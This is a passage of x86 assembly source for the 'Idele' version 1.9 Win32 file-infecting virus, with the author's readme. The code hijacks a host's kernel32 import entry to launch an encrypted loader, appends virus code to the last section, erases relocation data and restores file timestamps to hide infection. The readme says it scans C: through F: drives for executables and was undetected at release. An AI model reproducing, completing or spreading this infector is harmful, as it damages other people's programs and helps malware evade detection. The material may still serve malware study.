|
|
|||
|
call Rva2Offset ;eax=map pointer to the end of
|
|||
|
;import section
|
|||
|
|
|||
|
|
|||
|
xor ecx,ecx
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;[How many dword are free in the end of the import section]:
|
|||
|
|
|||
|
|
|||
|
HowManyDW:
|
|||
|
|
|||
|
sub eax,4
|
|||
|
sub esi,4
|
|||
|
cmp dword ptr [eax],0
|
|||
|
jz HowManyDW
|
|||
|
|
|||
|
add eax,8 ;we don't use the first free dword
|
|||
|
add esi,8
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
mov dword ptr [RVA_NewFT+ebp],esi
|
|||
|
mov dword ptr [FP_NewFT+ebp],eax
|
|||
|
|
|||
|
popad
|
|||
|
|
|||
|
;end of search import section
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;eax=RVA "Imports table"
|
|||
|
;ebx=RVA "Sections table"
|
|||
|
|
|||
|
|
|||
|
call Rva2Offset ;eax=file pointer to Import table
|
|||
|
xchg eax,edi ;edi= " " " " "
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SearchDll:
|
|||
|
|
|||
|
mov eax,dword ptr [edi+12]
|
|||
|
|
|||
|
or eax,eax
|
|||
|
je _NotFound
|
|||
|
|
|||
|
call Rva2Offset
|
|||
|
|
|||
|
cmp dword ptr [eax],"NREK" ;are there imports
|
|||
|
je DllFound ;from kernel32.dll?
|
|||
|
|
|||
|
cmp dword ptr [eax],"nrek" ; " "
|
|||
|
je DllFound
|
|||
|
|
|||
|
add edi,20
|
|||
|
jmp SearchDll
|
|||
|
|
|||
|
|
|||
|
_NotFoundV:
|
|||
|
|
|||
|
_NotFound:
|
|||
|
|
|||
|
popad
|
|||
|
jmp ExitInfectError0
|
|||
|
|
|||
|
|
|||
|
DllFound:
|
|||
|
|
|||
|
;edi= file pointer to KERNEL32.DLL structure in target
|
|||
|
|
|||
|
|
|||
|
|
|||
|
mov dword ptr [edi+4],0 ;TimeDate stamp set to 0
|
|||
|
mov dword ptr [edi+8],0
|
|||
|
mov eax,dword ptr [edi] ;eax=RVA of OriginalFirstThunk
|
|||
|
add edi,16
|
|||
|
mov edx,dword ptr [edi] ;edx=RVA of FirstThunk
|
|||
|
|
|||
|
|
|||
|
mov dword ptr [FP_FieldFT+ebp],edi
|
|||
|
|
|||
|
push eax ;compute file ptr to host First Thunk
|
|||
|
mov eax,edx
|
|||
|
call Rva2Offset
|
|||
|
mov dword ptr [FP_FT+ebp],eax
|
|||
|
pop eax
|
|||
|
|
|||
|
|
|||
|
pop ecx ;restore image base
|
|||
|
push ecx ;save it again
|
|||
|
|
|||
|
mov dword ptr [RVA_FT+ebp],edx
|
|||
|
|
|||
|
add ecx,edx ;compute VA of FirstThunk
|
|||
|
|
|||
|
mov dword ptr [VA_FT+ebp],ecx ;save it
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
or eax,eax
|
|||
|
jz No_OFT
|
|||
|
|
|||
|
pushad
|
|||
|
|
|||
|
push eax
|
|||
|
add eax,dword ptr [ImageBase+ebp]
|
|||
|
mov dword ptr [VA_OFT+ebp],eax
|
|||
|
pop eax
|
|||
|
|
|||
|
|
|||
|
call Rva2Offset
|
|||
|
|
|||
|
mov dword ptr [FP_OFT+ebp],eax ;File pointer to Original first
|
|||
|
;thunk
|
|||
|
|
|||
|
;[Compute the number of imported APIs from KERNEL32.DLL]:
|
|||
|
|
|||
|
xor ecx,ecx
|
|||
|
sub eax,4
|
|||
|
|
|||
|
ApiScan:
|
|||
|
inc ecx
|
|||
|
add eax,4
|
|||
|
cmp dword ptr [eax],0
|
|||
|
jnz ApiScan
|
|||
|
|
|||
|
|
|||
|
dec ecx ;ecx holds number of imported APIs from K32
|
|||
|
mov dword ptr [SizeT+ebp],ecx
|
|||
|
|
|||
|
|
|||
|
;*********************************************************************
|
|||
|
|
|||
|
|
|||
|
popad
|
|||
|
jmp OFT_Found
|
|||
|
|
|||
|
No_OFT:
|
|||
|
mov eax,edx
|
|||
|
|
|||
|
|
|||
|
OFT_Found:
|
|||
|
|
|||
|
|
|||
|
call Rva2Offset ;eax contains the RVA of an array of
|
|||
|
;RVAs.
|
|||
|
;Each of these RVAs points to a structure
|
|||
|
;The number of structures equals the
|
|||
|
;number of imported functions from
|
|||
|
;KERNEL32.DLL
|
|||
|
;We need to convert eax into a file
|
|||
|
;pointer.
|
|||
|
|
|||
|
sub edx,4
|
|||
|
sub eax,4
|
|||
|
lea edi,ApiHack+ebp
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Loop2:
|
|||
|
|
|||
|
add eax,4 ;eax=map ptr to OFT array
|
|||
|
add edx,4 ;edx= rva, browsing ft array
|
|||
|
|
|||
|
mov esi,dword ptr [eax] ;read an RVA of array
|
|||
|
|
|||
|
|
|||
|
or esi,esi
|
|||
|
|
|||
|
|
|||
|
jz _NotFound
|
|||
|
|
|||
|
test esi,80000000h ;ordinal?
|
|||
|
jnz Loop2
|
|||
|
|
|||
|
xor ecx,ecx
|
|||
|
|
|||
|
xchg eax,esi ;convert RVA to file offset
|
|||
|
|
|||
|
call Rva2Offset
|
|||
|
|
|||
|
xchg eax,esi
|
|||
|
|
|||
|
inc esi ;esi points to api name
|
|||
|
inc esi
|
|||
|
|
|||
|
|
|||
|
push edi
|
|||
|
push esi
|
|||
|
|
|||
|
DoAgain: ;move the api name into ApiHack
|
|||
|
|
|||
|
movsb
|
|||
|
inc ecx
|
|||
|
|
|||
|
cmp byte ptr [esi-1],0 ;end of string?
|
|||
|
jnz DoAgain
|
|||
|
|
|||
|
pop esi
|
|||
|
pop edi
|
|||
|
|
|||
|
cmp ecx,12 ;string + ",0" is 12 char?
|
|||
|
jl Loop2 ;not enough?...go back to Loop2
|
|||
|
|
|||
|
|
|||
|
pushad
|
|||
|
|
|||
|
|
|||
|
add eax,4
|
|||
|
|
|||
|
mov esi,dword ptr [eax]
|
|||
|
inc esi
|
|||
|
inc esi
|
|||
|
add esi,dword ptr [ImageBase+ebp]
|
|||
|
mov dword ptr [VA_API+ebp],esi
|
|||
|
mov dword ptr [eax],0
|
|||
|
|
|||
|
popad
|
|||
|
|
|||
|
|
|||
|
xchg esi,edi
|
|||
|
lea esi,GlobalAPI+ebp
|
|||
|
|
|||
|
|
|||
|
mov cl,12 ;GlobalAlloc string replace
|
|||
|
rep movsb ;one of api of the host
|
|||
|
|
|||
|
|
|||
|
pop edi ;edi =ImageBase of target
|
|||
|
|
|||
|
|
|||
|
add edx,edi ;address in Import table
|
|||
|
|
|||
|
|
|||
|
mov dword ptr [HackAdd+ebp],edx
|
|||
|
|
|||
|
mov dword ptr [API_Field+ebp],edx
|
|||
|
|
|||
|
|
|||
|
popad
|
|||
|
|
|||
|
|
|||
|
;***** End Import table Patching routine
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
pop edi ;restore MapAddress
|
|||
|
push eax ;save pointer to code loader
|
|||
|
|
|||
|
|
|||
|
|
|||
|
add dword ptr [Key+ebp],12345678h ;modify key
|
|||
|
|
|||
|
|
|||
|
|
|||
|
mov word ptr [edi+12h],"IT" ;mark the infected target
|
|||
|
mov dword ptr [edx+18h+24h],200h ;set FileAligment=200h
|
|||
|
|
|||
|
|
|||
|
mov ecx,dword ptr [esi+0ch]
|
|||
|
add edi,dword ptr [esi+14h] ;pointer to reloc section
|
|||
|
|
|||
|
|
|||
|
cmp dword ptr [edx+18h+96+40],ecx
|
|||
|
jnz NoReloc
|
|||
|
|
|||
|
cmp dword ptr [esi+10h],0a00h
|
|||
|
jnge NoReloc
|
|||
|
|
|||
|
;[Erase Relocation Section]:
|
|||
|
|
|||
|
|
|||
|
mov dword ptr [edx+18h+96+40],0
|
|||
|
mov dword ptr [edx+18h+96+44],0
|
|||
|
|
|||
|
mov dword ptr [esi],"adP." ;change the section name
|
|||
|
mov dword ptr [esi+4],"at"
|
|||
|
|
|||
|
add ecx,dword ptr [ImageBase+ebp]
|
|||
|
mov dword ptr [LastSectionCode+ebp],ecx
|
|||
|
sub dword ptr [FileSize+ebp],VirLength
|
|||
|
|
|||
|
jmp CopyEncrypt
|
|||
|
|
|||
|
;************************************************************************
|
|||
|
|
|||
|
|
|||
|
NoReloc:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
add edi,dword ptr [esi+10h] ;add rounded up last section raw-size
|
|||
|
|
|||
|
;[Compute beginning of code in the last section ,in memory]:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
mov ecx,dword ptr [esi+0ch] ;last section RVA in memory
|
|||
|
add ecx,dword ptr [esi+10h] ;add last section rounded up size
|
|||
|
add ecx,dword ptr [ImageBase+ebp]
|
|||
|
|
|||
|
|
|||
|
mov dword ptr [LastSectionCode+ebp],ecx
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;[Update size field in target last section header]:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
add dword ptr [esi+10h],0a00h
|
|||
|
add dword ptr [esi+08h],1000h
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;[Update size fields in target optional header]:
|
|||
|
|
|||
|
add dword ptr [edx+50h],1000h
|
|||
|
|
|||
|
|
|||
|
|
|||
|
CopyEncrypt:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
mov ecx,dword ptr [RVA_NewFT+ebp]
|
|||
|
mov esi,dword ptr [FP_FieldFT+ebp]
|
|||
|
mov dword ptr [esi],ecx
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
mov esi,dword ptr [API_Field+ebp]
|
|||
|
sub esi,dword ptr [RVA_FT+ebp]
|
|||
|
add esi,dword ptr [RVA_NewFT+ebp]
|
|||
|
|
|||
|
|
|||
|
mov dword ptr [ReturnAdd+ebp],esi
|
|||
|
mov dword ptr [Import+ebp],esi
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;[Copy and encrypt code in the last section]:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
mov ecx,(EndVir-BeginVir)/4
|
|||
|
lea esi,BeginVir+ebp
|
|||
|
call Crypt
|
|||
|
|
|||
|
;[ClearHeap]:
|
|||
|
|
|||
|
|
|||
|
push edi
|
|||
|
mov ecx,dword ptr [FileSize+ebp]
|
|||
|
sub edi,dword ptr [MapAddress+ebp]
|
|||
|
sub ecx,edi ;ecx=number of useless bytes in
|
|||
|
;the heap
|
|||
|
pop edi
|
|||
|
|
|||
|
xor eax,eax ;set eax to 0
|
|||
|
|
|||
|
Nullify:
|
|||
|
repne stosb
|
|||
|
|
|||
|
|
|||
|
;[compute new entry point]:
|
|||
|
|
|||
|
mov eax,dword ptr [ebx+0ch]
|
|||
|
add eax,dword ptr [ebx+10h]
|
|||
|
mov ecx,LoaderLength
|
|||
|
sub eax,ecx ;eax=RVA of Loader
|
|||
|
add eax,dword ptr [edx+18h+1ch] ;add ImageBase
|
|||
|
|
|||
|
push ecx ;save loader size
|
|||
|
|
|||
|
|
|||
|
mov ecx,dword ptr [SizeT+ebp]
|
|||
|
mov edi,dword ptr [FP_FT+ebp]
|
|||
|
rep stosd
|
|||
|
|
|||
|
|
|||
|
|
|||
|
mov esi,dword ptr [FP_OFT+ebp]
|
|||
|
mov edi,dword ptr [FP_NewFT+ebp]
|
|||
|
|
|||
|
|
|||
|
CopyMore:
|
|||
|
movsd
|
|||
|
cmp dword ptr [esi],0
|
|||
|
jnz CopyMore
|
|||
|
|
|||
|
pop ecx ;restore loader size
|
|||
|
|
|||
|
|
|||
|
;[Copy loader code to target file on disk]:
|
|||
|
|
|||
|
|
|||
|
pop edi ;restore pointer (on disk) to code loader
|
|||
|
lea esi,BeginLoader+ebp
|
|||
|
repne movsb
|
|||
|
|
|||
|
call CloseFileStuff
|
|||
|
popad
|
|||
|
dec dword ptr [Counter+ebp]
|
|||
|
jz Exit0
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
ExitInfectError2:
|
|||
|
|
|||
|
pop eax
|
|||
|
|
|||
|
|
|||
|
ExitInfectError0:
|
|||
|
|
|||
|
|
|||
|
pop eax
|
|||
|
|
|||
|
|
|||
|
ExitInfectError:
|
|||
|
|
|||
|
|
|||
|
sub dword ptr [FileSize+ebp],VirLength
|
|||
|
call CloseFileStuff
|
|||
|
popad
|
|||
|
ret
|
|||
|
|
|||
|
OpenFileStuff:
|
|||
|
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push 3
|
|||
|
push 0
|
|||
|
push 1
|
|||
|
push 80000000h or 40000000h ;Read and Code abilities
|
|||
|
lea eax,FileName+ebp
|
|||
|
push eax
|
|||
|
call dword ptr [CreateFileA+ebp]
|
|||
|
mov dword ptr [FileHandle+ebp],eax ;save FileHandle
|
|||
|
push 0
|
|||
|
push dword ptr [FileSize+ebp]
|
|||
|
push 0
|
|||
|
push 4
|
|||
|
push 0
|
|||
|
push dword ptr [FileHandle+ebp]
|
|||
|
call dword ptr [CreateFileMappingA+ebp]
|
|||
|
mov dword ptr [MapHandle+ebp],eax
|
|||
|
push dword ptr [FileSize+ebp]
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push 2
|
|||
|
push dword ptr [MapHandle+ebp]
|
|||
|
call dword ptr [MapViewOfFile+ebp]
|
|||
|
or eax,eax
|
|||
|
jz ExitOpenFileStuffError
|
|||
|
mov dword ptr [MapAddress+ebp],eax ;eax=Address of Mapping
|
|||
|
xchg eax,edx
|
|||
|
clc
|
|||
|
ret
|
|||
|
|
|||
|
ExitOpenFileStuffError:
|
|||
|
|
|||
|
stc
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
|
|||
|
CloseFileStuff:
|
|||
|
|
|||
|
|
|||
|
UnMap:
|
|||
|
push dword ptr [MapAddress+ebp]
|
|||
|
call dword ptr [UnmapViewOfFile+ebp]
|
|||
|
|
|||
|
CloseMapHandle:
|
|||
|
|
|||
|
push dword ptr [MapHandle+ebp]
|
|||
|
call dword ptr [CloseHandle+ebp]
|
|||
|
|
|||
|
ResizeFile:
|
|||
|
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push dword ptr [FileSize+ebp]
|
|||
|
push dword ptr [FileHandle+ebp]
|
|||
|
call dword ptr [SetFilePointer+ebp]
|
|||
|
|
|||
|
MarkEndOfFile:
|
|||
|
|
|||
|
push dword ptr [FileHandle+ebp]
|
|||
|
call dword ptr [SetEndOfFile+ebp]
|
|||
|
|
|||
|
|
|||
|
RestoreTime:
|
|||
|
|
|||
|
lea eax,LastWriteTime+ebp
|
|||
|
push eax
|
|||
|
lea eax,LastAccessTime+ebp
|
|||
|
push eax
|
|||
|
Lea eax,CreationTime+ebp
|
|||
|
push eax
|
|||
|
push dword ptr [FileHandle+ebp]
|
|||
|
call dword ptr [SetFileTime+ebp]
|
|||
|
|
|||
|
|
|||
|
CloseFile:
|
|||
|
|
|||
|
push dword ptr [FileHandle+ebp]
|
|||
|
call dword ptr [CloseHandle+ebp]
|
|||
|
|
|||
|
RestoreFileAttributs:
|
|||
|
|
|||
|
push dword ptr [FileAttributes+ebp]
|
|||
|
lea eax,FileName+ebp
|
|||
|
push eax
|
|||
|
call dword ptr [SetFileAttributesA+ebp]
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;change a RVA to a file pointer
|
|||
|
;In : ebx points to first section
|
|||
|
;Out: eax contains the file offset
|
|||
|
|
|||
|
Rva2Offset:
|
|||
|
|
|||
|
push ebx
|
|||
|
push ecx
|
|||
|
|
|||
|
mov ecx,dword ptr [SectN+ebp]
|
|||
|
|
|||
|
_Loop:
|
|||
|
|
|||
|
cmp dword ptr [ebx+12],eax
|
|||
|
|
|||
|
jg _Find
|
|||
|
|
|||
|
NoRawData:
|
|||
|
|
|||
|
add ebx,28h
|
|||
|
|
|||
|
loop _Loop
|
|||
|
|
|||
|
|
|||
|
_Find:
|
|||
|
|
|||
|
sub eax,dword ptr [ebx-28h+12]
|
|||
|
add eax,dword ptr [ebx-28h+20]
|
|||
|
add eax,dword ptr [MapAddress+ebp]
|
|||
|
|
|||
|
pop ecx
|
|||
|
pop ebx
|
|||
|
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
BeginLoader:
|
|||
|
|
|||
|
pushad
|
|||
|
push 2000h
|
|||
|
push 0
|
|||
|
db 0ffh,15h ;call GlobalAlloc
|
|||
|
ReturnAdd dd 0
|
|||
|
|
|||
|
push eax ;prepare jump to virus
|
|||
|
xchg eax,edi ;added to modify scan string
|
|||
|
|
|||
|
mov ecx,(VirLength)/4
|
|||
|
db 0beh ;mov esi,****
|
|||
|
LastSectionCode dd 0
|
|||
|
|
|||
|
Crypt:
|
|||
|
lodsd
|
|||
|
db 35h
|
|||
|
Key dd 0abcdef12h
|
|||
|
stosd
|
|||
|
dec ecx
|
|||
|
jnz Crypt
|
|||
|
ret ;go to beginning of code
|
|||
|
|
|||
|
EndLoader:
|
|||
|
|
|||
|
|
|||
|
Constants:
|
|||
|
|
|||
|
ApiNb equ 21
|
|||
|
MaxPath equ 260
|
|||
|
Miliseconds equ 1500
|
|||
|
HowMany equ 1
|
|||
|
VirLength equ 0a00h
|
|||
|
VirLength0 equ EndVir0-BeginVir
|
|||
|
LoaderLength equ EndLoader-BeginLoader
|
|||
|
|
|||
|
Sign db "Idele virus version 1.9"
|
|||
|
db "DoxtorL./[T.I]/Dec.Y2K"
|
|||
|
|
|||
|
|
|||
|
SizeT dd 0
|
|||
|
VA_API dd 0
|
|||
|
|
|||
|
ImageBase dd 0
|
|||
|
|
|||
|
|
|||
|
FP_OFT dd 0
|
|||
|
VA_OFT dd 0
|
|||
|
|
|||
|
|
|||
|
FP_FieldFT dd 0
|
|||
|
FP_FT dd 0
|
|||
|
RVA_FT dd 0
|
|||
|
VA_FT dd 0
|
|||
|
|
|||
|
FP_NewFT dd 0
|
|||
|
RVA_NewFT dd 0
|
|||
|
VA_NewFT dd 0
|
|||
|
|
|||
|
FindMatch db "*.exe",0
|
|||
|
FindMatch2 db "*.*",0
|
|||
|
DotDot db "..",0
|
|||
|
GlobalAPI db "GlobalAlloc",0
|
|||
|
ApiHack db "GlobalAlloc",0 ;only for the
|
|||
|
;1st generation
|
|||
|
db 26 dup (0) ;reserved for char
|
|||
|
;of api name found
|
|||
|
|
|||
|
|
|||
|
ApiList dd 0fdbe9ddfh ;CloseHandle
|
|||
|
dd 04b00fba1h ;CreateFileA
|
|||
|
dd 00d6ea22eh ;CreateFileMappingA
|
|||
|
dd 0be307c51h ;CreateThread
|
|||
|
dd 0be7b8631h ;FindClose
|
|||
|
dd 0c915738fh ;FindFirstFileA
|
|||
|
dd 08851f43dh ;FindNextFileA
|
|||
|
dd 028f8c6fbh ;GetCurrentDirectoryA
|
|||
|
dd 00029ecfbh ;GetCurrentProcessId
|
|||
|
dd 09c3a5210h ;GetDriveTypeA
|
|||
|
dd 040bf2f84h ;GetProcAddress
|
|||
|
dd 032beddc3h ;MapViewOfFile
|
|||
|
dd 0c329f65bh ;OpenProcess
|
|||
|
dd 08e0e5487h ;SetCurrentDirectoryA
|
|||
|
dd 0bc738ae6h ;SetEndOfFile
|
|||
|
dd 050665047h ;SetFileAttributesA
|
|||
|
dd 06d452a3ah ;SetFilePointer
|
|||
|
dd 09f69de76h ;SetFileTime
|
|||
|
dd 03a00e23bh ;Sleep
|
|||
|
dd 0fae00d65h ;UnmapViewOfFile
|
|||
|
dd 01e9fa310h ;WriteProcessMemory
|
|||
|
EndVir: ;What is following isn't appended to target
|
|||
|
|
|||
|
|
|||
|
;ApiAddresses:
|
|||
|
|
|||
|
CloseHandle dd 0
|
|||
|
CreateFileA dd 0
|
|||
|
CreateFileMappingA dd 0
|
|||
|
CreateThread dd 0
|
|||
|
FindClose dd 0
|
|||
|
FindFirstFileA dd 0
|
|||
|
FindNextFileA dd 0
|
|||
|
GetCurrentDirectoryA dd 0
|
|||
|
GetCurrentProcessId dd 0
|
|||
|
GetDriveTypeA dd 0
|
|||
|
_GetProcAddress dd 0
|
|||
|
MapViewOfFile dd 0
|
|||
|
OpenProcess dd 0
|
|||
|
SetCurrentDirectoryA dd 0
|
|||
|
SetEndOfFile dd 0
|
|||
|
SetFileAttributesA dd 0
|
|||
|
SetFilePointer dd 0
|
|||
|
SetFileTime dd 0
|
|||
|
_Sleep dd 0
|
|||
|
UnmapViewOfFile dd 0
|
|||
|
WriteProcessMemory dd 0
|
|||
|
|
|||
|
;Variables:
|
|||
|
|
|||
|
FileHandle dd 0
|
|||
|
MapHandle dd 0
|
|||
|
MapAddress dd 0
|
|||
|
Counter dd 0
|
|||
|
Crc dd 0
|
|||
|
Depth dd 0
|
|||
|
ThreadID dd 0
|
|||
|
SectN dd 0
|
|||
|
ApiOriginalAdd dd 0
|
|||
|
API_Field dd 0
|
|||
|
|
|||
|
;search structure:
|
|||
|
|
|||
|
FileAttributes dd ? ; attributes
|
|||
|
CreationTime dd ?,? ; time of creation
|
|||
|
LastAccessTime dd ?,? ; last access time
|
|||
|
LastWriteTime dd ?,? ; last modificationm
|
|||
|
FileSizeHigh dd ? ; filesize
|
|||
|
FileSize dd ? ;
|
|||
|
Reserved0 dd ? ;
|
|||
|
Reserved1 dd ? ;
|
|||
|
FileName db MaxPath DUP (?) ; long filename
|
|||
|
AlternateFileName db 13 DUP (?) ; short filename
|
|||
|
DirExe db MaxPath DUP (?)
|
|||
|
EndVir0:
|
|||
|
|
|||
|
API_Buffer:
|
|||
|
|
|||
|
dd 16 dup (0)
|
|||
|
|
|||
|
end HOST
|
|||
|
----------------------------------------------------------------[IDELE.ASM]---
|
|||
|
-----------------------------------------------------------------[READ.1ST]---
|
|||
|
Doxtor L./[Technological Illusions] presents:
|
|||
|
|
|||
|
|
|||
|
IDELE virus version 1.9 July-December 2000
|
|||
|
|
|||
|
|
|||
|
Description:
|
|||
|
|
|||
|
This is a per-process encrypted virus. It uses a new EPO (*) technic
|
|||
|
(as far i know), nothing is modified in the host code part.
|
|||
|
|
|||
|
The virus searchs targets on C:,D:,E:,F: drives when ever those drives are
|
|||
|
accessible.
|
|||
|
|
|||
|
The virus works fine on Win9x/Win nt4 platforms, but don't work
|
|||
|
on Win 2k platform.
|
|||
|
|
|||
|
This virus is undetected at the time it was completed,
|
|||
|
yet it's not destructive, but it's a computer virus so use it at your own
|
|||
|
risks !
|
|||
|
|
|||
|
I can't be held as responsible for use/misuse of this program.
|
|||
|
This program was only designed for research aims.
|
|||
|
|
|||
|
(Is fire guns dealers can be held also as responsible for the death of
|
|||
|
a young guy somewhere in the world when someone uses a machine gun
|
|||
|
to kill him ?)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
(*) E.P.O=Entry Point Obscured
|
|||
|
-----------------------------------------------------------------[READ.1ST]---
|